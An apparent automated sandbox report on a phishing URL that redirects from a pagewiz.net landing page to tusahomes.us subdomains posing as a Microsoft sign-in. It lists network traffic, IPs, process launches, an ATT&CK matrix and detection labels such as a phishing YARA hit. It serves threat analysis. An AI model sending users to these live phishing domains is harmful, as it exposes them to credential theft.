            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Apr 2025 00:19:11 GMTContent-Type: text/html; charset=utf-8Content-Length: 0Connection: closecache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 98b1f517-dd42-4897-a235-15c9e2ac0600x-ms-ests-server: 2.1.20540.2 - EUS ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Apr 2025 00:19:18 GMTContent-Type: text/html; charset=utf-8Content-Length: 0Connection: closecache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: b82159b7-241d-4665-b797-ffe2c8952b00x-ms-ests-server: 2.1.20540.2 - SCUS ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Apr 2025 00:19:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 0Connection: closecache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: 0532fe95-ff43-444c-8aaf-4b18cd822600x-ms-ests-server: 2.1.20540.2 - EUS ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Apr 2025 00:19:48 GMTContent-Type: text/html; charset=utf-8Content-Length: 0Connection: closecache-control: privatep3p: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: da5d7921-ba57-4aa5-a6aa-1545fcd92a00x-ms-ests-server: 2.1.20540.2 - SCUS ProdSlicesreport-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.Preferrer-policy: strict-origin-when-cross-originaccess-control-allow-origin: *access-control-allow-headers: *
            Source: chromecache_103.4.drString found in binary or memory: http://e5faadac711040eb937b0912c3da77fd.tusahomes.us/
            Source: chromecache_108.4.drString found in binary or memory: http://fancyapps.com/fancybox/
            Source: chromecache_82.4.drString found in binary or memory: http://log.imoon.info/index.html?PAGE_ID=
            Source: chromecache_76.4.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: chromecache_89.4.drString found in binary or memory: http://www.google.com/fonts/earlyaccess
            Source: chromecache_103.4.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
            Source: chromecache_75.4.drString found in binary or memory: https://13ed1ff861d94c6daedecfbb5c3a2270.tusahomes.us
            Source: chromecache_103.4.drString found in binary or memory: https://21f6d35d7587443b8bb832dc786aaf9e.tusahomes.us/douglascrockford/JSON-js
            Source: chromecache_75.4.drString found in binary or memory: https://300e1b2ce1a7492a96e37e48ada077e8.tusahomes.us
            Source: chromecache_75.4.drString found in binary or memory: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
            Source: chromecache_75.4.drString found in binary or memory: https://358bda4ee93f4d7e892828ac40949b9c.tusahomes.us
            Source: chromecache_75.4.drString found in binary or memory: https://3a91bb8c3181471eb888670f91e8c086.tusahomes.us
            Source: chromecache_75.4.drString found in binary or memory: https://6f5fb8dbb10b4959bef1db0ca1018bed.tusahomes.us
            Source: chromecache_75.4.drString found in binary or memory: https://9a8c9517625949ea8fa3d65334092b8d.tusahomes.us
            Source: chromecache_75.4.drString found in binary or memory: https://aace5a839df74152aceaaf57ce684743.tusahomes.us
            Source: chromecache_75.4.drString found in binary or memory: https://b2fe0b31e2db4a9bb8612e8faea6b3fc.tusahomes.us
            Source: chromecache_75.4.drString found in binary or memory: https://ef2ef9be16e34f1fb8a6223a6703c135.tusahomes.us
            Source: chromecache_75.4.drString found in binary or memory: https://f169b5b085ea4e1ba7289951debea536.tusahomes.us
            Source: chromecache_96.4.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS-muw.woff2)
            Source: chromecache_96.4.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTS2mu1aB.woff2)
            Source: chromecache_96.4.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSCmu1aB.woff2)
            Source: chromecache_96.4.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSGmu1aB.woff2)
            Source: chromecache_96.4.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2)
            Source: chromecache_96.4.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2)
            Source: chromecache_96.4.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2)
            Source: chromecache_96.4.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSymu1aB.woff2)
            Source: chromecache_96.4.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTUGmu1aB.woff2)
            Source: chromecache_96.4.drString found in binary or memory: https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTVOmu1aB.woff2)
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49675
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.5:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.207:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.235:443 -> 192.168.2.5:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.127.206.234:443 -> 192.168.2.5:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.168.137.144:443 -> 192.168.2.5:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.168.137.144:443 -> 192.168.2.5:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.168.137.144:443 -> 192.168.2.5:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.168.137.144:443 -> 192.168.2.5:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49774 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49776 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49784 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 137.184.178.231:443 -> 192.168.2.5:49786 version: TLS 1.2
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir4980_275725084Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir4980_275725084Jump to behavior
            Source: classification engineClassification label: mal64.phis.win@24/83@45/8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,8053180832996022845,13226496335574999677,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2368 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,8053180832996022845,13226496335574999677,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5056 /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://p1.pagewiz.net/vericastharlandclarke/"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,8053180832996022845,13226496335574999677,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2368 /prefetch:3Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,8053180832996022845,13226496335574999677,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5056 /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Drive-by Compromise
            Windows Management InstrumentationPath Interception1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media5
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            File Deletion
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive6
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1660141 URL: http://p1.pagewiz.net/veric... Startdate: 09/04/2025 Architecture: WINDOWS Score: 64 24 Suricata IDS alerts for network traffic 2->24 26 AI detected phishing page 2->26 28 Yara detected HtmlPhish54 2->28 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 16 192.168.2.5, 138, 443, 49185 unknown unknown 6->16 11 chrome.exe 6->11         started        14 chrome.exe 6->14         started        process5 dnsIp6 18 c547f1062152409fa58dda457a02be72.tusahomes.us 137.184.178.231, 443, 49733, 49734 PANDGUS United States 11->18 20 vericast.tusahomes.us 11->20 22 15 other IPs or domains 11->22

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            http://p1.pagewiz.net/vericastharlandclarke/0%Avira URL Cloudsafe
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://e5faadac711040eb937b0912c3da77fd.tusahomes.us/0%Avira URL Cloudsafe
            https://b2fe0b31e2db4a9bb8612e8faea6b3fc.tusahomes.us0%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg0%Avira URL Cloudsafe
            https://358bda4ee93f4d7e892828ac40949b9c.tusahomes.us0%Avira URL Cloudsafe
            https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/favicon.ico0%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif0%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/style2/lpCommon.css?v=18.01.240%Avira URL Cloudsafe
            http://p1.pagewiz.net/favicon.ico0%Avira URL Cloudsafe
            https://9a8c9517625949ea8fa3d65334092b8d.tusahomes.us0%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/fancybox/source/jquery.fancybox.css?v=18.01.240%Avira URL Cloudsafe
            https://ab52444af96f49b7b110b6e3700ca950.tusahomes.us/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=00%Avira URL Cloudsafe
            https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/67f5bce71f9fd88e9ef40d75/0%Avira URL Cloudsafe
            http://log.imoon.info/index.html?PAGE_ID=0%Avira URL Cloudsafe
            https://8f0da58963954c5ebda6645ba9a83b28.tusahomes.us/Me.htm?v=30%Avira URL Cloudsafe
            https://21f6d35d7587443b8bb832dc786aaf9e.tusahomes.us/douglascrockford/JSON-js0%Avira URL Cloudsafe
            https://aace5a839df74152aceaaf57ce684743.tusahomes.us0%Avira URL Cloudsafe
            https://330c68f2903044fdaf0390e944b7092d.tusahomes.us0%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/style2/bootstrap.min.css?v=18.01.240%Avira URL Cloudsafe
            https://static.pagewizcdn.com/LPStaticResources/fancybox/source/jquery.fancybox.js?v=18.01.240%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4f75990aeef30238698e.js0%Avira URL Cloudsafe
            http://p1.pagewiz.net/Handler/Clicklog.aspx?PageId=6484670%Avira URL Cloudsafe
            https://13ed1ff861d94c6daedecfbb5c3a2270.tusahomes.us0%Avira URL Cloudsafe
            https://69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico0%Avira URL Cloudsafe
            https://126d7c624ad3410bb741b30b9bf3d28f.tusahomes.us/shared/1.0/content/js/BssoInterrupt_Core_9810YxmrLqOR1rQ4anyNMg2.js0%Avira URL Cloudsafe
